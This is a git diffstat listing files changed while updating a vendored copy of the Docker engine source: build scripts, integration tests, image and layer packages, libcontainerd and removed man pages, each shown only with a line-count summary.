 .../docker/experimental/images/ipvlan-l3.png  |  Bin 18260 -> 0 bytes
 .../docker/experimental/images/ipvlan-l3.svg  |    1 -
 .../images/ipvlan_l2_simple.gliffy            |    1 -
 .../experimental/images/ipvlan_l2_simple.png  |  Bin 20145 -> 0 bytes
 .../experimental/images/ipvlan_l2_simple.svg  |    1 -
 .../images/macvlan-bridge-ipvlan-l2.gliffy    |    1 -
 .../images/macvlan-bridge-ipvlan-l2.png       |  Bin 14527 -> 0 bytes
 .../images/macvlan-bridge-ipvlan-l2.svg       |    1 -
 .../images/multi_tenant_8021q_vlans.gliffy    |    1 -
 .../images/multi_tenant_8021q_vlans.png       |  Bin 17879 -> 0 bytes
 .../images/multi_tenant_8021q_vlans.svg       |    1 -
 .../images/vlans-deeper-look.gliffy           |    1 -
 .../experimental/images/vlans-deeper-look.png |  Bin 38837 -> 0 bytes
 .../experimental/images/vlans-deeper-look.svg |    1 -
 .../docker/experimental/vlan-networks.md      |  471 --
 .../docker/hack/Jenkins/W2L/postbuild.sh      |   35 -
 .../docker/docker/hack/Jenkins/W2L/setup.sh   |  309 -
 .../docker/docker/hack/Jenkins/readme.md      |    3 -
 .../github.com/docker/docker/hack/README.md   |   55 +
 vendor/github.com/docker/docker/hack/ci/arm   |   10 +
 .../docker/docker/hack/ci/experimental        |    9 +
 vendor/github.com/docker/docker/hack/ci/janky |   17 +
 .../github.com/docker/docker/hack/ci/powerpc  |    6 +
 vendor/github.com/docker/docker/hack/ci/z     |    6 +
 vendor/github.com/docker/docker/hack/dind     |    2 +-
 .../docker/hack/dockerfile/binaries-commits   |   11 -
 .../hack/dockerfile/install-binaries.sh       |  123 -
 .../dockerfile/install/containerd.installer   |   36 +
 .../dockerfile/install/dockercli.installer    |   31 +
 .../dockerfile/install/gometalinter.installer |   12 +
 .../docker/hack/dockerfile/install/install.sh |   30 +
 .../hack/dockerfile/install/proxy.installer   |   38 +
 .../hack/dockerfile/install/runc.installer    |   22 +
 .../hack/dockerfile/install/tini.installer    |   14 +
 .../hack/dockerfile/install/tomlv.installer   |   12 +
 .../hack/dockerfile/install/vndr.installer    |   11 +
 .../docker/docker/hack/generate-authors.sh    |    2 +-
 .../docker/hack/generate-swagger-api.sh       |   23 +-
 .../github.com/docker/docker/hack/install.sh  |  484 --
 .../hack/integration-cli-on-swarm/README.md   |   69 +
 .../integration-cli-on-swarm/agent/Dockerfile |    6 +
 .../agent/master/call.go                      |  132 +
 .../agent/master/master.go                    |   65 +
 .../agent/master/set.go                       |   28 +
 .../agent/master/set_test.go                  |   63 +
 .../agent/types/types.go                      |   18 +
 .../agent/vendor.conf                         |    2 +
 .../agent/worker/executor.go                  |  118 +
 .../agent/worker/worker.go                    |   69 +
 .../integration-cli-on-swarm/host/compose.go  |  122 +
 .../host/dockercmd.go                         |   64 +
 .../host/enumerate.go                         |   55 +
 .../host/enumerate_test.go                    |   84 +
 .../integration-cli-on-swarm/host/host.go     |  198 +
 .../integration-cli-on-swarm/host/volume.go   |   88 +
 vendor/github.com/docker/docker/hack/make.ps1 |  123 +-
 vendor/github.com/docker/docker/hack/make.sh  |  140 +-
 .../docker/docker/hack/make/.binary           |   45 +-
 .../docker/docker/hack/make/.binary-setup     |    3 +-
 .../docker/docker/hack/make/.build-deb/compat |    1 -
 .../docker/hack/make/.build-deb/control       |   29 -
 .../.build-deb/docker-engine.bash-completion  |    1 -
 .../.build-deb/docker-engine.docker.default   |    1 -
 .../make/.build-deb/docker-engine.docker.init |    1 -
 .../.build-deb/docker-engine.docker.upstart   |    1 -
 .../make/.build-deb/docker-engine.install     |   12 -
 .../make/.build-deb/docker-engine.manpages    |    1 -
 .../make/.build-deb/docker-engine.postinst    |   20 -
 .../hack/make/.build-deb/docker-engine.udev   |    1 -
 .../docker/docker/hack/make/.build-deb/docs   |    1 -
 .../docker/docker/hack/make/.build-deb/rules  |   55 -
 .../.build-rpm/docker-engine-selinux.spec     |   96 -
 .../hack/make/.build-rpm/docker-engine.spec   |  254 -
 .../docker/hack/make/.detect-daemon-osarch    |   50 +-
 .../docker/docker/hack/make/.ensure-emptyfs   |   28 +-
 .../docker/docker/hack/make/.go-autogen       |   13 +-
 .../docker/docker/hack/make/.go-autogen.ps1   |    6 +-
 .../hack/make/.integration-daemon-setup       |    6 +-
 .../hack/make/.integration-daemon-start       |   54 +-
 .../docker/hack/make/.integration-daemon-stop |   13 +-
 .../hack/make/.integration-test-helpers       |  139 +-
 .../docker/docker/hack/make/README.md         |    3 +-
 .../github.com/docker/docker/hack/make/binary |    7 +-
 .../docker/docker/hack/make/binary-client     |   12 -
 .../docker/docker/hack/make/binary-daemon     |   34 +-
 .../docker/docker/hack/make/build-deb         |   91 -
 .../hack/make/build-integration-test-binary   |   12 +-
 .../docker/docker/hack/make/build-rpm         |  148 -
 .../docker/docker/hack/make/clean-apt-repo    |   43 -
 .../docker/docker/hack/make/clean-yum-repo    |   20 -
 .../github.com/docker/docker/hack/make/cover  |   15 -
 .../github.com/docker/docker/hack/make/cross  |   33 +-
 .../docker/docker/hack/make/dynbinary         |    7 +-
 .../docker/docker/hack/make/dynbinary-client  |   12 -
 .../docker/docker/hack/make/dynbinary-daemon  |    4 +-
 .../docker/hack/make/generate-index-listing   |   74 -
 .../docker/docker/hack/make/install-binary    |   27 +-
 .../docker/hack/make/install-binary-client    |   10 -
 .../docker/hack/make/install-binary-daemon    |   16 -
 .../docker/docker/hack/make/install-script    |   63 -
 .../docker/docker/hack/make/release-deb       |  163 -
 .../docker/docker/hack/make/release-rpm       |   71 -
 vendor/github.com/docker/docker/hack/make/run |    6 +-
 .../docker/docker/hack/make/sign-repos        |   65 -
 .../docker/docker/hack/make/test-deb-install  |   71 -
 .../docker/docker/hack/make/test-docker-py    |    2 +-
 .../docker/hack/make/test-install-script      |   31 -
 .../docker/docker/hack/make/test-integration  |   21 +
 .../docker/hack/make/test-integration-cli     |   30 +-
 .../docker/hack/make/test-integration-shell   |    4 +-
 .../docker/docker/hack/make/test-old-apt-repo |   29 -
 .../docker/docker/hack/make/test-unit         |   55 -
 vendor/github.com/docker/docker/hack/make/tgz |   92 -
 .../github.com/docker/docker/hack/make/ubuntu |  190 -
 .../docker/docker/hack/make/update-apt-repo   |   70 -
 vendor/github.com/docker/docker/hack/make/win |   20 -
 .../github.com/docker/docker/hack/release.sh  |  325 -
 .../docker/docker/hack/test/e2e-run.sh        |   72 +
 .../github.com/docker/docker/hack/test/unit   |   38 +
 .../docker/docker/hack/validate/.validate     |    2 +-
 .../docker/docker/hack/validate/all           |    2 +-
 .../hack/validate/changelog-date-descending   |   12 +
 .../hack/validate/changelog-well-formed       |   25 +
 .../docker/hack/validate/compose-bindata      |   28 -
 .../docker/docker/hack/validate/dco           |    2 +-
 .../docker/docker/hack/validate/default       |    9 +-
 .../docker/hack/validate/default-seccomp      |    2 +-
 .../hack/validate/deprecate-integration-cli   |   25 +
 .../docker/docker/hack/validate/gofmt         |   33 -
 .../docker/docker/hack/validate/gometalinter  |   13 +
 .../docker/hack/validate/gometalinter.json    |   27 +
 .../docker/docker/hack/validate/lint          |   31 -
 .../docker/docker/hack/validate/pkg-imports   |    2 +-
 .../docker/docker/hack/validate/swagger       |    2 +-
 .../docker/docker/hack/validate/swagger-gen   |    4 +-
 .../docker/docker/hack/validate/test-imports  |    2 +-
 .../docker/docker/hack/validate/toml          |    2 +-
 .../docker/docker/hack/validate/vendor        |   71 +-
 .../docker/docker/hack/validate/vet           |   32 -
 .../github.com/docker/docker/hack/vendor.sh   |    2 +-
 .../docker/{daemon => image/cache}/cache.go   |  263 +-
 .../{runconfig => image/cache}/compare.go     |   10 +-
 .../cache}/compare_test.go                    |   52 +-
 vendor/github.com/docker/docker/image/fs.go   |   30 +-
 .../github.com/docker/docker/image/fs_test.go |  344 +-
 .../github.com/docker/docker/image/image.go   |  112 +-
 .../docker/docker/image/image_test.go         |   98 +-
 .../github.com/docker/docker/image/rootfs.go  |   12 +-
 .../docker/docker/image/spec/README.md        |   46 +
 .../docker/docker/image/spec/v1.1.md          |   22 +-
 .../docker/docker/image/spec/v1.2.md          |   35 +-
 .../github.com/docker/docker/image/spec/v1.md |   43 +-
 .../github.com/docker/docker/image/store.go   |  100 +-
 .../docker/docker/image/store_test.go         |  331 +-
 .../docker/docker/image/tarexport/load.go     |  101 +-
 .../docker/docker/image/tarexport/save.go     |  176 +-
 .../docker/image/tarexport/tarexport.go       |   14 +-
 .../docker/docker/image/v1/imagev1.go         |   18 +-
 .../docker/docker/image/v1/imagev1_test.go    |    2 +-
 .../docker/integration-cli/benchmark_test.go  |    2 +-
 .../docker/integration-cli/check_test.go      |  278 +-
 .../checker/checker.go                        |    2 +-
 .../docker/integration-cli/cli/build/build.go |   82 +
 .../docker/docker/integration-cli/cli/cli.go  |  226 +
 .../docker/docker/integration-cli/daemon.go   |  608 --
 .../docker/integration-cli/daemon/daemon.go   |  143 +
 .../integration-cli/daemon/daemon_swarm.go    |  197 +
 .../docker/integration-cli/daemon_swarm.go    |  419 --
 ...warm_hack.go => daemon_swarm_hack_test.go} |    9 +-
 .../docker/integration-cli/daemon_unix.go     |   35 -
 .../docker/integration-cli/daemon_windows.go  |   53 -
 .../integration-cli/docker_api_attach_test.go |   98 +-
 .../integration-cli/docker_api_auth_test.go   |   25 -
 .../integration-cli/docker_api_build_test.go  |  372 +-
 .../docker_api_build_windows_test.go          |   39 +
 .../docker_api_containers_test.go             | 1692 +++--
 .../docker_api_containers_windows_test.go     |   76 +
 .../integration-cli/docker_api_create_test.go |  152 +-
 .../integration-cli/docker_api_events_test.go |   73 -
 .../docker_api_exec_resize_test.go            |   42 +-
 .../integration-cli/docker_api_exec_test.go   |  209 +-
 .../integration-cli/docker_api_images_test.go |  150 +-
 .../integration-cli/docker_api_info_test.go   |   53 -
 .../docker_api_inspect_test.go                |   26 +-
 .../docker_api_inspect_unix_test.go           |   35 -
 .../docker_api_ipcmode_test.go                |  213 +
 .../integration-cli/docker_api_logs_test.go   |  163 +-
 .../docker_api_network_test.go                |  149 +-
 .../integration-cli/docker_api_resize_test.go |   44 -
 .../docker_api_service_update_test.go         |   39 -
 .../integration-cli/docker_api_stats_test.go  |   52 +-
 .../docker_api_stats_unix_test.go             |   41 -
 .../docker_api_swarm_node_test.go             |  127 +
 .../docker_api_swarm_service_test.go          |  612 ++
 .../integration-cli/docker_api_swarm_test.go  | 1223 ++--
 .../docker/integration-cli/docker_api_test.go |   72 +-
 .../docker_api_update_unix_test.go            |   35 -
 .../docker_api_version_test.go                |   23 -
 .../docker_api_volumes_test.go                |   89 -
 .../integration-cli/docker_cli_attach_test.go |   25 +-
 .../docker_cli_attach_unix_test.go            |   24 +-
 .../docker_cli_authz_plugin_v2_test.go        |  133 -
 .../docker_cli_authz_unix_test.go             |  477 --
 .../integration-cli/docker_cli_build_test.go  | 6169 +++++++----------
 .../docker_cli_build_unix_test.go             |   81 +-
 .../docker_cli_by_digest_test.go              |   76 +-
 .../integration-cli/docker_cli_commit_test.go |   37 +-
 .../docker_cli_config_create_test.go          |  131 +
 .../integration-cli/docker_cli_config_test.go |  140 -
 .../docker_cli_cp_from_container_test.go      |  133 +-
 .../integration-cli/docker_cli_cp_test.go     |   20 +-
 .../docker_cli_cp_to_container_test.go        |  150 +-
 .../docker_cli_cp_to_container_unix_test.go   |   46 +-
 ...p_utils.go => docker_cli_cp_utils_test.go} |   90 +-
 .../integration-cli/docker_cli_create_test.go |  211 +-
 .../docker_cli_daemon_plugins_test.go         |  209 +-
 .../integration-cli/docker_cli_daemon_test.go | 1707 ++---
 .../integration-cli/docker_cli_diff_test.go   |   98 -
 .../integration-cli/docker_cli_events_test.go |  125 +-
 .../docker_cli_events_unix_test.go            |   65 +-
 .../integration-cli/docker_cli_exec_test.go   |  136 +-
 .../docker_cli_exec_unix_test.go              |   12 +-
 .../docker_cli_experimental_test.go           |   36 -
 .../docker_cli_export_import_test.go          |   39 +-
 ...er_cli_external_volume_driver_unix_test.go |  122 +-
 .../integration-cli/docker_cli_health_test.go |   86 +-
 .../integration-cli/docker_cli_help_test.go   |  321 -
 .../docker_cli_history_test.go                |   12 +-
 .../integration-cli/docker_cli_images_test.go |  102 +-
 .../integration-cli/docker_cli_import_test.go |   52 +-
 .../integration-cli/docker_cli_info_test.go   |  102 +-
 .../docker_cli_info_unix_test.go              |    2 +-
 .../docker_cli_inspect_test.go                |   68 +-
 .../integration-cli/docker_cli_kill_test.go   |  134 -
 .../integration-cli/docker_cli_links_test.go  |   49 +-
 .../docker_cli_links_unix_test.go             |   26 -
 .../integration-cli/docker_cli_login_test.go  |   22 +-
 .../integration-cli/docker_cli_logout_test.go |   26 +-
 .../integration-cli/docker_cli_logs_test.go   |  144 +-
 .../integration-cli/docker_cli_nat_test.go    |   93 -
 .../docker_cli_netmode_test.go                |    8 +-
 .../docker_cli_network_unix_test.go           |  286 +-
 .../docker_cli_oom_killed_test.go             |   30 -
 .../integration-cli/docker_cli_pause_test.go  |   66 -
 .../docker_cli_plugins_logdriver_test.go      |   48 +
 .../docker_cli_plugins_test.go                |  268 +-
 .../integration-cli/docker_cli_port_test.go   |   40 +-
 .../integration-cli/docker_cli_proxy_test.go  |   36 +-
 .../docker_cli_prune_unix_test.go             |  250 +-
 .../integration-cli/docker_cli_ps_test.go     |  504 +-
 .../docker_cli_pull_local_test.go             |   82 +-
 .../integration-cli/docker_cli_pull_test.go   |   46 +-
 .../docker_cli_pull_trusted_test.go           |  365 -
 .../integration-cli/docker_cli_push_test.go   |  367 +-
 .../docker_cli_registry_user_agent_test.go    |   75 +-
 .../integration-cli/docker_cli_rename_test.go |  138 -
 .../docker_cli_restart_test.go                |   61 +-
 .../integration-cli/docker_cli_rm_test.go     |   86 -
 .../integration-cli/docker_cli_rmi_test.go    |  116 +-
 .../integration-cli/docker_cli_run_test.go    | 1278 ++--
 .../docker_cli_run_unix_test.go               |  399 +-
 .../docker_cli_save_load_test.go              |   86 +-
 .../docker_cli_save_load_unix_test.go         |   30 +-
 .../integration-cli/docker_cli_search_test.go |    6 +-
 .../docker_cli_secret_create_test.go          |   59 +-
 .../docker_cli_secret_inspect_test.go         |   68 -
 .../docker_cli_service_create_test.go         |  324 +-
 .../docker_cli_service_health_test.go         |  101 +-
 ...cker_cli_service_logs_experimental_test.go |   96 -
 .../docker_cli_service_logs_test.go           |  388 ++
 .../docker_cli_service_scale_test.go          |    6 +-
 .../docker_cli_service_update_test.go         |  115 +-
 .../integration-cli/docker_cli_sni_test.go    |    2 +-
 .../integration-cli/docker_cli_stack_test.go  |  186 -
 .../integration-cli/docker_cli_start_test.go  |   38 +-
 .../integration-cli/docker_cli_stats_test.go  |   27 +-
 .../integration-cli/docker_cli_stop_test.go   |   17 -
 .../integration-cli/docker_cli_swarm_test.go  | 1422 +++-
 .../docker_cli_swarm_unix_test.go             |   60 +-
 .../integration-cli/docker_cli_tag_test.go    |  225 -
 .../integration-cli/docker_cli_top_test.go    |   16 +-
 .../integration-cli/docker_cli_update_test.go |   41 -
 .../docker_cli_update_unix_test.go            |   64 +-
 .../integration-cli/docker_cli_userns_test.go |   16 +-
 .../docker_cli_v2_only_test.go                |  103 +-
 .../docker_cli_version_test.go                |   58 -
 .../integration-cli/docker_cli_volume_test.go |  350 +-
 .../integration-cli/docker_cli_wait_test.go   |    5 +-
 .../docker_deprecated_api_v124_test.go        |   83 +-
 .../docker_deprecated_api_v124_unix_test.go   |    5 +-
 .../docker_experimental_network_test.go       |  594 --
 .../docker_hub_pull_suite_test.go             |   18 +-
 .../integration-cli/docker_test_vars.go       |  165 -
 .../docker/integration-cli/docker_utils.go    | 1607 -----
 .../integration-cli/docker_utils_test.go      |  466 ++
 .../environment/environment.go                |   49 +
 .../{events_utils.go => events_utils_test.go} |    6 +-
 .../docker/docker/integration-cli/fixtures.go |   69 -
 .../auth/docker-credential-shell-test         |    2 +-
 .../fixtures/deploy/default.yaml              |    9 -
 .../fixtures/deploy/remove.yaml               |   11 -
 .../fixtures/deploy/secrets.yaml              |   20 -
 .../integration-cli/fixtures/https/ca.pem     |   24 +-
 .../fixtures/https/client-cert.pem            |   74 +-
 .../fixtures/https/client-key.pem             |   17 +-
 .../fixtures/https/server-cert.pem            |   77 +-
 .../fixtures/https/server-key.pem             |   17 +-
 .../fixtures/notary/delgkey1.crt              |   21 -
 .../fixtures/notary/delgkey1.key              |   27 -
 .../fixtures/notary/delgkey2.crt              |   21 -
 .../fixtures/notary/delgkey2.key              |   27 -
 .../fixtures/notary/delgkey3.crt              |   21 -
 .../fixtures/notary/delgkey3.key              |   27 -
 .../fixtures/notary/delgkey4.crt              |   21 -
 .../fixtures/notary/delgkey4.key              |   27 -
 .../integration-cli/fixtures/notary/gen.sh    |   18 -
 .../fixtures/notary/localhost.cert            |   19 -
 .../fixtures/notary/localhost.key             |   27 -
 .../integration-cli/fixtures/secrets/default  |    1 -
 ...aemon.go => fixtures_linux_daemon_test.go} |   36 +-
 .../docker/docker/integration-cli/registry.go |  177 -
 .../docker/integration-cli/registry_mock.go   |   55 -
 .../requirement/requirement.go                |   34 +
 .../docker/integration-cli/requirements.go    |  243 -
 .../integration-cli/requirements_test.go      |  219 +
 .../integration-cli/requirements_unix.go      |  159 -
 .../integration-cli/requirements_unix_test.go |  117 +
 ...st_vars_exec.go => test_vars_exec_test.go} |    0
 ...ars_noexec.go => test_vars_noexec_test.go} |    0
 ...seccomp.go => test_vars_noseccomp_test.go} |    0
 ...s_seccomp.go => test_vars_seccomp_test.go} |    0
 .../{test_vars.go => test_vars_test.go}       |    2 +-
 ...st_vars_unix.go => test_vars_unix_test.go} |    0
 ...s_windows.go => test_vars_windows_test.go} |    0
 .../load => testdata}/emptyLayer.tar          |  Bin
 .../docker/integration-cli/trust_server.go    |  344 -
 .../docker/docker/integration-cli/utils.go    |   79 -
 .../docker/integration-cli/utils_test.go      |  183 +
 .../integration/build/build_session_test.go   |  129 +
 .../integration/build/build_squash_test.go    |  103 +
 .../docker/integration/build/build_test.go    |  460 ++
 .../docker/integration/build/main_test.go     |   33 +
 .../docker/integration/config/config_test.go  |  356 +
 .../docker/integration/config/main_test.go    |   33 +
 .../docker/integration/container/copy_test.go |   65 +
 .../integration/container/create_test.go      |  303 +
 .../container/daemon_linux_test.go            |   78 +
 .../docker/integration/container/diff_test.go |   42 +
 .../docker/integration/container/exec_test.go |   50 +
 .../integration/container/export_test.go      |   78 +
 .../integration/container/health_test.go      |   47 +
 .../integration/container/inspect_test.go     |   48 +
 .../docker/integration/container/kill_test.go |  183 +
 .../integration/container/links_linux_test.go |   57 +
 .../docker/integration/container/logs_test.go |   35 +
 .../docker/integration/container/main_test.go |   33 +
 .../container/mounts_linux_test.go            |  208 +
 .../docker/integration/container/nat_test.go  |  120 +
 .../integration/container/pause_test.go       |   98 +
 .../docker/integration/container/ps_test.go   |   49 +
 .../integration/container/remove_test.go      |  112 +
 .../integration/container/rename_test.go      |  213 +
 .../integration/container/resize_test.go      |   66 +
 .../integration/container/restart_test.go     |  114 +
 .../integration/container/stats_test.go       |   43 +
 .../docker/integration/container/stop_test.go |  127 +
 .../container/update_linux_test.go            |  107 +
 .../integration/container/update_test.go      |   64 +
 .../docker/docker/integration/doc.go          |    3 +
 .../docker/integration/image/commit_test.go   |   48 +
 .../docker/integration/image/import_test.go   |   42 +
 .../docker/integration/image/main_test.go     |   33 +
 .../docker/integration/image/remove_test.go   |   59 +
 .../docker/integration/image/tag_test.go      |  140 +
 .../internal/container/container.go           |   54 +
 .../integration/internal/container/exec.go    |   86 +
 .../integration/internal/container/ops.go     |  136 +
 .../integration/internal/container/states.go  |   41 +
 .../integration/internal/network/network.go   |   35 +
 .../integration/internal/network/ops.go       |   87 +
 .../internal/requirement/requirement.go       |   53 +
 .../integration/internal/swarm/service.go     |  200 +
 .../docker/integration/network/delete_test.go |   73 +
 .../docker/integration/network/helpers.go     |   85 +
 .../integration/network/inspect_test.go       |  180 +
 .../integration/network/ipvlan/ipvlan_test.go |  432 ++
 .../integration/network/ipvlan/main_test.go   |   33 +
 .../network/macvlan/macvlan_test.go           |  282 +
 .../integration/network/macvlan/main_test.go  |   33 +
 .../docker/integration/network/main_test.go   |   33 +
 .../integration/network/service_test.go       |  315 +
 .../plugin/authz/authz_plugin_test.go         |  521 ++
 .../plugin/authz/authz_plugin_v2_test.go      |  175 +
 .../integration/plugin/authz/main_test.go     |  180 +
 .../plugin/graphdriver/external_test.go}      |  307 +-
 .../plugin/graphdriver/main_test.go           |   36 +
 .../plugin/logging/cmd/close_on_start/main.go |   48 +
 .../logging/cmd/close_on_start/main_test.go   |    1 +
 .../plugin/logging/cmd/cmd_test.go            |    1 +
 .../plugin/logging/cmd/dummy/main.go          |   19 +
 .../plugin/logging/cmd/dummy/main_test.go     |    1 +
 .../plugin/logging/helpers_test.go            |   67 +
 .../plugin/logging/logging_test.go            |   79 +
 .../integration/plugin/logging/main_test.go   |   29 +
 .../plugin/logging/validation_test.go         |   35 +
 .../docker/integration/plugin/pkg_test.go     |    1 +
 .../plugin/volumes/cmd/cmd_test.go            |    1 +
 .../plugin/volumes/cmd/dummy/main.go          |   19 +
 .../plugin/volumes/cmd/dummy/main_test.go     |    1 +
 .../plugin/volumes/helpers_test.go            |   73 +
 .../integration/plugin/volumes/main_test.go   |   32 +
 .../integration/plugin/volumes/mounts_test.go |   58 +
 .../docker/integration/secret/main_test.go    |   33 +
 .../docker/integration/secret/secret_test.go  |  366 +
 .../docker/integration/service/create_test.go |  374 +
 .../integration/service/inspect_test.go       |  153 +
 .../docker/integration/service/main_test.go   |   33 +
 .../integration/service/network_test.go       |   75 +
 .../docker/integration/service/plugin_test.go |  121 +
 .../docker/integration/session/main_test.go   |   33 +
 .../integration/session/session_test.go       |   48 +
 .../system/cgroupdriver_systemd_test.go       |   56 +
 .../docker/integration/system/event_test.go   |  122 +
 .../integration/system/info_linux_test.go     |   48 +
 .../docker/integration/system/info_test.go    |   42 +
 .../docker/integration/system/login_test.go   |   28 +
 .../docker/integration/system/main_test.go    |   33 +
 .../docker/integration/system/version_test.go |   23 +
 .../docker/integration/testdata/https/ca.pem  |   23 +
 .../testdata/https/client-cert.pem            |   73 +
 .../integration/testdata/https/client-key.pem |   16 +
 .../testdata/https/server-cert.pem            |   76 +
 .../integration/testdata/https/server-key.pem |   16 +
 .../docker/integration/volume/main_test.go    |   33 +
 .../docker/integration/volume/volume_test.go  |  116 +
 .../docker/internal/test/daemon/config.go     |   82 +
 .../docker/internal/test/daemon/container.go  |   40 +
 .../docker/internal/test/daemon/daemon.go     |  681 ++
 .../internal/test/daemon/daemon_unix.go       |   39 +
 .../internal/test/daemon/daemon_windows.go    |   25 +
 .../docker/internal/test/daemon/node.go       |   82 +
 .../docker/docker/internal/test/daemon/ops.go |   44 +
 .../docker/internal/test/daemon/plugin.go     |   77 +
 .../docker/internal/test/daemon/secret.go     |   84 +
 .../docker/internal/test/daemon/service.go    |  131 +
 .../docker/internal/test/daemon/swarm.go      |  194 +
 .../docker/internal/test/environment/clean.go |  217 +
 .../internal/test/environment/environment.go  |  158 +
 .../internal/test/environment/protect.go      |  254 +
 .../internal/test/fakecontext/context.go      |  131 +
 .../docker/internal/test/fakegit/fakegit.go   |  136 +
 .../internal/test/fakestorage/fixtures.go     |   92 +
 .../internal/test/fakestorage/storage.go      |  200 +
 .../test}/fixtures/load/frozen.go             |   86 +-
 .../test/fixtures/plugin/basic/basic.go       |   34 +
 .../internal/test/fixtures/plugin/plugin.go   |  216 +
 .../docker/docker/internal/test/helper.go     |    6 +
 .../docker/internal/test/registry/ops.go      |   26 +
 .../docker/internal/test/registry/registry.go |  255 +
 .../internal/test/registry/registry_mock.go   |   71 +
 .../test/request}/npipe.go                    |    2 +-
 .../test/request}/npipe_windows.go            |    2 +-
 .../docker/internal/test/request/ops.go       |   78 +
 .../docker/internal/test/request/request.go   |  218 +
 .../docker/internal/testutil/helpers.go       |   17 +
 .../docker/internal/testutil/stringutils.go   |   14 +
 .../internal/testutil/stringutils_test.go     |   34 +
 .../github.com/docker/docker/layer/empty.go   |    7 +-
 .../docker/docker/layer/empty_test.go         |   14 +-
 .../docker/docker/layer/filestore.go          |   25 +-
 .../docker/docker/layer/filestore_test.go     |    8 +-
 .../docker/docker/layer/filestore_unix.go     |   15 +
 .../docker/docker/layer/filestore_windows.go  |   35 +
 .../github.com/docker/docker/layer/layer.go   |   70 +-
 .../docker/docker/layer/layer_store.go        |  152 +-
 .../docker/layer/layer_store_windows.go       |    2 +-
 .../docker/docker/layer/layer_test.go         |   71 +-
 .../docker/docker/layer/layer_unix.go         |    4 +-
 .../docker/docker/layer/layer_unix_test.go    |    6 +-
 .../docker/docker/layer/layer_windows.go      |   76 +-
 .../docker/docker/layer/migration.go          |   16 +-
 .../docker/docker/layer/migration_test.go     |   18 +-
 .../docker/docker/layer/mount_test.go         |   51 +-
 .../docker/docker/layer/mounted_layer.go      |    5 +-
 .../docker/docker/layer/ro_layer.go           |   38 +-
 .../docker/docker/layer/ro_layer_windows.go   |    2 +-
 .../docker/docker/libcontainerd/client.go     |   46 -
 .../docker/libcontainerd/client_daemon.go     |  894 +++
 .../libcontainerd/client_daemon_linux.go      |  108 +
 .../libcontainerd/client_daemon_windows.go    |   55 +
 .../docker/libcontainerd/client_linux.go      |  605 --
 .../libcontainerd/client_local_windows.go     | 1319 ++++
 .../docker/libcontainerd/client_solaris.go    |  101 -
 .../docker/libcontainerd/client_unix.go       |  142 -
 .../docker/libcontainerd/client_windows.go    |  631 --
 .../docker/docker/libcontainerd/container.go  |   13 -
 .../docker/libcontainerd/container_unix.go    |  250 -
 .../docker/libcontainerd/container_windows.go |  311 -
 .../docker/docker/libcontainerd/errors.go     |   13 +
 .../docker/docker/libcontainerd/oom_linux.go  |   31 -
 .../docker/libcontainerd/oom_solaris.go       |    5 -
 .../docker/libcontainerd/pausemonitor_unix.go |   42 -
 .../docker/docker/libcontainerd/process.go    |   18 -
 .../docker/libcontainerd/process_unix.go      |  107 -
 .../docker/libcontainerd/process_windows.go   |   19 +-
 .../libcontainerd/{queue_unix.go => queue.go} |   10 +-
 .../docker/docker/libcontainerd/queue_test.go |   31 +
 .../docker/docker/libcontainerd/remote.go     |   20 -
 .../docker/libcontainerd/remote_daemon.go     |  344 +
 .../libcontainerd/remote_daemon_linux.go      |   61 +
 .../libcontainerd/remote_daemon_options.go    |  141 +
 .../remote_daemon_options_linux.go            |   18 +
 .../libcontainerd/remote_daemon_windows.go    |   50 +
 .../docker/libcontainerd/remote_local.go      |   59 +
 .../docker/libcontainerd/remote_unix.go       |  544 --
 .../docker/libcontainerd/remote_windows.go    |   36 -
 .../docker/docker/libcontainerd/types.go      |  139 +-
 .../docker/libcontainerd/types_linux.go       |   57 +-
 .../docker/libcontainerd/types_solaris.go     |   43 -
 .../docker/libcontainerd/types_windows.go     |   71 +-
 .../docker/libcontainerd/utils_linux.go       |   62 +-
 .../docker/libcontainerd/utils_solaris.go     |   27 -
 .../docker/libcontainerd/utils_windows.go     |   48 +-
 .../libcontainerd/utils_windows_test.go       |    2 +-
 .../github.com/docker/docker/man/Dockerfile   |   24 -
 .../docker/docker/man/Dockerfile.5.md         |  474 --
 .../docker/docker/man/Dockerfile.aarch64      |   25 -
 .../docker/docker/man/Dockerfile.armhf        |   43 -
 .../docker/docker/man/Dockerfile.ppc64le      |   35 -
 .../docker/docker/man/Dockerfile.s390x        |   35 -
 vendor/github.com/docker/docker/man/README.md |   15 -
 .../docker/docker/man/docker-attach.1.md      |   99 -
 .../docker/docker/man/docker-build.1.md       |  340 -
 .../docker/docker/man/docker-commit.1.md      |   71 -
 .../docker/docker/man/docker-config-json.5.md |   72 -
 .../docker/docker/man/docker-cp.1.md          |  175 -
 .../docker/docker/man/docker-create.1.md      |  553 --
 .../docker/docker/man/docker-diff.1.md        |   49 -
 .../docker/docker/man/docker-events.1.md      |  180 -
 .../docker/docker/man/docker-exec.1.md        |   71 -
 .../docker/docker/man/docker-export.1.md      |   46 -
 .../docker/docker/man/docker-history.1.md     |   52 -
 .../docker/docker/man/docker-images.1.md      |  153 -
 .../docker/docker/man/docker-import.1.md      |   72 -
 .../docker/docker/man/docker-info.1.md        |  187 -
 .../docker/docker/man/docker-inspect.1.md     |  323 -
 .../docker/docker/man/docker-kill.1.md        |   28 -
 .../docker/docker/man/docker-load.1.md        |   56 -
 .../docker/docker/man/docker-login.1.md       |   53 -
 .../docker/docker/man/docker-logout.1.md      |   32 -
 .../docker/docker/man/docker-logs.1.md        |   71 -
 .../docker/man/docker-network-connect.1.md    |   66 -
 .../docker/man/docker-network-create.1.md     |  187 -
 .../docker/man/docker-network-disconnect.1.md |   36 -
 .../docker/man/docker-network-inspect.1.md    |  112 -
 .../docker/docker/man/docker-network-ls.1.md  |  188 -
 .../docker/docker/man/docker-network-rm.1.md  |   43 -
 .../docker/docker/man/docker-pause.1.md       |   32 -
 .../docker/docker/man/docker-port.1.md        |   47 -
 .../docker/docker/man/docker-ps.1.md          |  145 -
 .../docker/docker/man/docker-pull.1.md        |  220 -
 .../docker/docker/man/docker-push.1.md        |   63 -
 .../docker/docker/man/docker-rename.1.md      |   15 -
 .../docker/docker/man/docker-restart.1.md     |   26 -
 .../docker/docker/man/docker-rm.1.md          |   72 -
 .../docker/docker/man/docker-rmi.1.md         |   42 -
 .../docker/docker/man/docker-run.1.md         | 1055 ---
 .../docker/docker/man/docker-save.1.md        |   45 -
 .../docker/docker/man/docker-search.1.md      |   70 -
 .../docker/docker/man/docker-start.1.md       |   39 -
 .../docker/docker/man/docker-stats.1.md       |   57 -
 .../docker/docker/man/docker-stop.1.md        |   30 -
 .../docker/docker/man/docker-tag.1.md         |   76 -
